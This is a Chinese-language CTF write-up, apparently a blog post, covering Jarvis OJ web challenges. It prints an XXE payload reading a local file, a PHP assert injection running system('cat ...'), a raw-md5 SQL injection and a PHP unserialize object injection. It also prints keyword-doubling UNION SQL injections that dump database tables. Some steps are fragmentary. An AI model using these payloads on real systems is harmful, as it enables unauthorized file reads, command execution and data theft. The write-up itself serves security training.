layout: pagetitle: “Jarvis OJ-WEB-WriteUp”
date: 2019-09-22 01:01
- 查看网页源代码 在
中看到XMLHttpRequest - 通过post请求上传xml文件 这里可以利用XXE漏洞(XML外部实体注入)
- bp抓包 默认
Content-Type: application/json
<?xml version="1.0"?>
<!DOCTYPE GVI [<!ENTITY xxe SYSTEM "file:///home/ctf/flag.txt" >]>
- CTF{XxE_15_n0T_S7range_Enough}
进入网页显示localhost access only!!
- X-Forwarded-For:
- PCTF{X_F0rw4rd_F0R_is_not_s3cuRe}
- 进入网页显示Please use port 51 to visit this site.
- url是
却提示让我们通过51端口访问 - 是我理解错了 应该是本地端口51访问 用到
- 构造exp
sudo curl --local-port 51
- ???
进入网页显示Hello World
- 扫目录 index.php与robot.txt
- 前者无发现 后者发现
Disallow: /admin_s3cr3t.php
- 进入admin_s3cr3t.php 显示ctf{hello guest}
- 肯定不是 postman分析
- 在about处看到博主使用git 涉及git源码泄露
- 用gittools 下载源代码
./ ../git
./ ../git ../src
- 在src目录 目录结构
├── commit-meta.txt
├── index.php
└── templates
├── about.php
├── contact.php
├── flag.php
└── home.php
- flag.php 中flag被抹去 查看index.php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!");
- 看到
执行字符串代码,存在注入 - 构造payload'.system("tac templates/flag.php").''.system("cat templates/flag.php;").'//查看源代码' and die(show_source('templates/flag.php')) or '
- 61dctf{8e_careful_when_us1ng_ass4rt}
是一道sql注入题 (需要钻研)
- postman分析header
hint:"select * from
adminwhere password='".md5($pass,true)."'"
- 重点是md5($pass,true) 当参数二位true时返回16位原始二进制格式的字符串
- 假设
- sql语句就变成
select * from
adminwhere password=''or'6?]??!r,??b
- password=’’自然可以过 后者
是以6(数字)开头相当于or 1
- 也就是sql语句
select * from
adminwhere password=''or 1
自然可以查询 不过经查询 类似与'1xxx'=1
这种判别方法在mysql有效 在其他数据库并不一定可以 - 输入
- PCTF{R4w_md5_is_d4ng3rous}
Hint1: 先找到源码再说吧~~
- 题目位注入 先让我们找到源码
- 用SourceLeakHacker扫一下 找出
$table = $_GET['table']?$_GET['table']:"test";
$table = Filter($table);
mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
$sql = "select 'flag{xxx}' from secret_{$table}";
$ret = sql_query($sql);
echo $ret[0];
- 输入几个数据check 提示
Wrong Password!!
- 没有头绪查看源代码发现
- 搜索字符串
Wrong Password!!
function(t) {
self.checkpass(e) ? self.setState({
errmsg: "Success!!",
errcolor: b.green400
}) : (self.setState({
errmsg: "Wrong Password!!"
- 可以看到是一个三目运算的条件判断 查找一下
if (25 !== e.length) return !1;
for (var t = [], n = 0; n < 25; n++) t.push(e.charCodeAt(n));
for (var r = [325799, 309234, 317320, 327895, 298316, 301249, 330242, 289290, 273446, 337687, 258725, 267444, 373557, 322237, 344478, 362136, 331815, 315157, 299242, 305418, 313569, 269307, 338319, 306491, 351259], o = [
[11, 13, 32, 234, 236, 3, 72, 237, 122, 230, 157, 53, 7, 225, 193, 76, 142, 166, 11, 196, 194, 187, 152, 132, 135],
[76, 55, 38, 70, 98, 244, 201, 125, 182, 123, 47, 86, 67, 19, 145, 12, 138, 149, 83, 178, 255, 122, 238, 187, 221],
[218, 233, 17, 56, 151, 28, 150, 196, 79, 11, 150, 128, 52, 228, 189, 107, 219, 87, 90, 221, 45, 201, 14, 106, 230],
[30, 50, 76, 94, 172, 61, 229, 109, 216, 12, 181, 231, 174, 236, 159, 128, 245, 52, 43, 11, 207, 145, 241, 196, 80],
[134, 145, 36, 255, 13, 239, 212, 135, 85, 194, 200, 50, 170, 78, 51, 10, 232, 132, 60, 122, 117, 74, 117, 250, 45],
[142, 221, 121, 56, 56, 120, 113, 143, 77, 190, 195, 133, 236, 111, 144, 65, 172, 74, 160, 1, 143, 242, 96, 70, 107],
[229, 79, 167, 88, 165, 38, 108, 27, 75, 240, 116, 178, 165, 206, 156, 193, 86, 57, 148, 187, 161, 55, 134, 24, 249],
[235, 175, 235, 169, 73, 125, 114, 6, 142, 162, 228, 157, 160, 66, 28, 167, 63, 41, 182, 55, 189, 56, 102, 31, 158],
[37, 190, 169, 116, 172, 66, 9, 229, 188, 63, 138, 111, 245, 133, 22, 87, 25, 26, 106, 82, 211, 252, 57, 66, 98],
[199, 48, 58, 221, 162, 57, 111, 70, 227, 126, 43, 143, 225, 85, 224, 141, 232, 141, 5, 233, 69, 70, 204, 155, 141],
[212, 83, 219, 55, 132, 5, 153, 11, 0, 89, 134, 201, 255, 101, 22, 98, 215, 139, 0, 78, 165, 0, 126, 48, 119],
[194, 156, 10, 212, 237, 112, 17, 158, 225, 227, 152, 121, 56, 10, 238, 74, 76, 66, 80, 31, 73, 10, 180, 45, 94],
[110, 231, 82, 180, 109, 209, 239, 163, 30, 160, 60, 190, 97, 256, 141, 199, 3, 30, 235, 73, 225, 244, 141, 123, 208],
[220, 248, 136, 245, 123, 82, 120, 65, 68, 136, 151, 173, 104, 107, 172, 148, 54, 218, 42, 233, 57, 115, 5, 50, 196],
[190, 34, 140, 52, 160, 34, 201, 48, 214, 33, 219, 183, 224, 237, 157, 245, 1, 134, 13, 99, 212, 230, 243, 236, 40],
[144, 246, 73, 161, 134, 112, 146, 212, 121, 43, 41, 174, 146, 78, 235, 202, 200, 90, 254, 216, 113, 25, 114, 232, 123],
[158, 85, 116, 97, 145, 21, 105, 2, 256, 69, 21, 152, 155, 88, 11, 232, 146, 238, 170, 123, 135, 150, 161, 249, 236],
[251, 96, 103, 188, 188, 8, 33, 39, 237, 63, 230, 128, 166, 130, 141, 112, 254, 234, 113, 250, 1, 89, 0, 135, 119],
[192, 206, 73, 92, 174, 130, 164, 95, 21, 153, 82, 254, 20, 133, 56, 7, 163, 48, 7, 206, 51, 204, 136, 180, 196],
[106, 63, 252, 202, 153, 6, 193, 146, 88, 118, 78, 58, 214, 168, 68, 128, 68, 35, 245, 144, 102, 20, 194, 207, 66],
[154, 98, 219, 2, 13, 65, 131, 185, 27, 162, 214, 63, 238, 248, 38, 129, 170, 180, 181, 96, 165, 78, 121, 55, 214],
[193, 94, 107, 45, 83, 56, 2, 41, 58, 169, 120, 58, 105, 178, 58, 217, 18, 93, 212, 74, 18, 217, 219, 89, 212],
[164, 228, 5, 133, 175, 164, 37, 176, 94, 232, 82, 0, 47, 212, 107, 111, 97, 153, 119, 85, 147, 256, 130, 248, 235],
[221, 178, 50, 49, 39, 215, 200, 188, 105, 101, 172, 133, 28, 88, 83, 32, 45, 13, 215, 204, 141, 226, 118, 233, 156],
[236, 142, 87, 152, 97, 134, 54, 239, 49, 220, 233, 216, 13, 143, 145, 112, 217, 194, 114, 221, 150, 51, 136, 31, 198]
], n = 0; n < 25; n++) {
for (var i = 0, a = 0; a < 25; a++) i += t[a] * o[n][a];
if (i !== r[n]) return !1
return !0
- 线性方程组 写出对应py
import numpy as np
o = [[11, 13, 32, 234, 236, 3, 72, 237, 122, 230, 157, 53, 7, 225, 193, 76, 142, 166, 11, 196, 194, 187, 152, 132, 135], [76, 55, 38, 70, 98, 244, 201, 125, 182, 123, 47, 86, 67, 19, 145, 12, 138, 149, 83, 178, 255, 122, 238, 187, 221], [218, 233, 17, 56, 151, 28, 150, 196, 79, 11, 150, 128, 52, 228, 189, 107, 219, 87, 90, 221, 45, 201, 14, 106, 230], [30, 50, 76, 94, 172, 61, 229, 109, 216, 12, 181, 231, 174, 236, 159, 128, 245, 52, 43, 11, 207, 145, 241, 196, 80], [134, 145, 36, 255, 13, 239, 212, 135, 85, 194, 200, 50, 170, 78, 51, 10, 232, 132, 60, 122, 117, 74, 117, 250, 45], [142, 221, 121, 56, 56, 120, 113, 143, 77, 190, 195, 133, 236, 111, 144, 65, 172, 74, 160, 1, 143, 242, 96, 70, 107], [229, 79, 167, 88, 165, 38, 108, 27, 75, 240, 116, 178, 165, 206, 156, 193, 86, 57, 148, 187, 161, 55, 134, 24, 249], [235, 175, 235, 169, 73, 125, 114, 6, 142, 162, 228, 157, 160, 66, 28, 167, 63, 41, 182, 55, 189, 56, 102, 31, 158], [37, 190, 169, 116, 172, 66, 9, 229, 188, 63, 138, 111, 245, 133, 22, 87, 25, 26, 106, 82, 211, 252, 57, 66, 98], [199, 48, 58, 221, 162, 57, 111, 70, 227, 126, 43, 143, 225, 85, 224, 141, 232, 141, 5, 233, 69, 70, 204, 155, 141], [212, 83, 219, 55, 132, 5, 153, 11, 0, 89, 134, 201, 255, 101, 22, 98, 215, 139, 0, 78, 165, 0, 126, 48, 119], [194, 156, 10, 212, 237, 112, 17, 158, 225, 227, 152, 121, 56, 10, 238, 74, 76, 66, 80, 31, 73, 10, 180, 45, 94], [110, 231, 82, 180, 109, 209, 239, 163, 30, 160, 60, 190, 97, 256, 141, 199, 3, 30, 235, 73, 225, 244, 141, 123, 208], [220, 248, 136, 245, 123, 82, 120, 65, 68, 136, 151, 173, 104, 107, 172, 148, 54, 218, 42, 233, 57, 115, 5, 50, 196], [190, 34, 140, 52, 160, 34, 201, 48, 214, 33, 219, 183, 224, 237, 157, 245, 1, 134, 13, 99, 212, 230, 243, 236, 40], [144, 246, 73, 161, 134, 112, 146, 212, 121, 43, 41, 174, 146, 78, 235, 202, 200, 90, 254, 216, 113, 25, 114, 232, 123], [158, 85, 116, 97, 145, 21, 105, 2, 256, 69, 21, 152, 155, 88, 11, 232, 146, 238, 170, 123, 135, 150, 161, 249, 236], [251, 96, 103, 188, 188, 8, 33, 39, 237, 63, 230, 128, 166, 130, 141, 112, 254, 234, 113, 250, 1, 89, 0, 135, 119], [192, 206, 73, 92, 174, 130, 164, 95, 21, 153, 82, 254, 20, 133, 56, 7, 163, 48, 7, 206, 51, 204, 136, 180, 196], [106, 63, 252, 202, 153, 6, 193, 146, 88, 118, 78, 58, 214, 168, 68, 128, 68, 35, 245, 144, 102, 20, 194, 207, 66], [154, 98, 219, 2, 13, 65, 131, 185, 27, 162, 214, 63, 238, 248, 38, 129, 170, 180, 181, 96, 165, 78, 121, 55, 214], [193, 94, 107, 45, 83, 56, 2, 41, 58, 169, 120, 58, 105, 178, 58, 217, 18, 93, 212, 74, 18, 217, 219, 89, 212], [164, 228, 5, 133, 175, 164, 37, 176, 94, 232, 82, 0, 47, 212, 107, 111, 97, 153, 119, 85, 147, 256, 130, 248, 235], [221, 178, 50, 49, 39, 215, 200, 188, 105, 101, 172, 133, 28, 88, 83, 32, 45, 13, 215, 204, 141, 226, 118, 233, 156], [236, 142, 87, 152, 97, 134, 54, 239, 49, 220, 233, 216, 13, 143, 145, 112, 217, 194, 114, 221, 150, 51, 136, 31, 198]]
r = [325799, 309234, 317320, 327895, 298316, 301249, 330242, 289290, 273446, 337687, 258725, 267444, 373557, 322237, 344478, 362136, 331815, 315157, 299242, 305418, 313569, 269307, 338319, 306491, 351259]
o = np.array(o)
r = np.array(r)
x = np.linalg.solve(o,r)
flag = ''
for i in range(len(x)):
flag += chr(int(round(x[i])))
print flag
- QWB{R3ac7_1s_interesting}
- 查看源码
<img src="showimg.php?img=c2hpZWxkLmpwZw==" width="100%"/>
- 含有base64
- 尝试读取index.php
$x = new Shield();
isset($_GET['class']) && $g = $_GET['class'];
if (!empty($g)) {
$x = unserialize($g);
echo $x->readfile();
- index.php包含shield.php 尝试读取shield.php
//flag is in pctf.php
class Shield {
public $file;
function __construct($filename = '') {
$this -> file = $filename;
function readfile() {
if (!empty($this->file) && stripos($this->file,'..')===FALSE
&& stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
return @file_get_contents($this->file);
- 构造pctf.php反序列化 得
class Shield {
public $file = "pctf.php";
$chybeta = new Shield();
- 构造payload
- PCTF{W3lcome_To_Shi3ld_secret_Ar3a}
IN A Mess
- index.phps
echo "<!--index.phps-->";
header('Location: index.php?id=1');
echo 'Hahahahahaha';
return ;
$data = @file_get_contents($a,'r');
if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
print "work harder!harder!harder!";
- 三个参数 id b a
- id需要等于0 但第一个if id不能为0 可用十六进制0x0绕过
- a 用php://input绕过
b长度得大于5 第一个字符不能为4 同时
为真- 用%00阶段 b=%0012345
- payload
POST /index.php?id=0x0&a=php://input&b=%0012345 HTTP/1.1
1112 is a nice lab!
- reponse
<!--index.phps-->Come ON!!! {/^HT2mCpcvOLf}
- 访问^HT2mCpcvOLf
显示hi666 同时地址栏自动补全
- 猜测是sql注入 且服务器屏蔽了空格关键词
注释代替空格 ununionion代替union selselectect代替select - 查找列数^HT2mCpcvOLf/index.php?id=0/*123*/ununionion/*123*/selselectect/*123*/1,2,3#
返回3 - 查找数据库名^HT2mCpcvOLf/index.php?id=0/*123*/ununionion/*123*/selselectect/*123*/1,2,database()#
返回test - 查找表名^HT2mCpcvOLf/index.php?id=0/*1*/ununionion/*1*/selselectect/*1*/1,2,group_concat(table_name)/*1*/frofromm/*1*/information_schema.tables/*1*/where/*1*/table_schema=0x74657374#
information_schema为数据库信息 0x74657374为test 返回content - 查询content表的列^HT2mCpcvOLf/index.php?id=0/*1*/ununionion/*1*/selselectect/*1*/1,2,group_concat(column_name)/*1*/frofromm/*1*/information_schema.columns/*1*/where/*1*/table_name=0x636f6e74656e74
返回id,context,title - 输出id context title*123*/uniunionon/*123*/selselectect/*123*/1,2,group_concat(id,context,title)/*123*/frfromom/*111*/content#
- 返回1PCTF{Fin4lly_U_got_i7_C0ngRatulation5}hi666
- PCTF{Fin4lly_U_got_i7_C0ngRatulation5}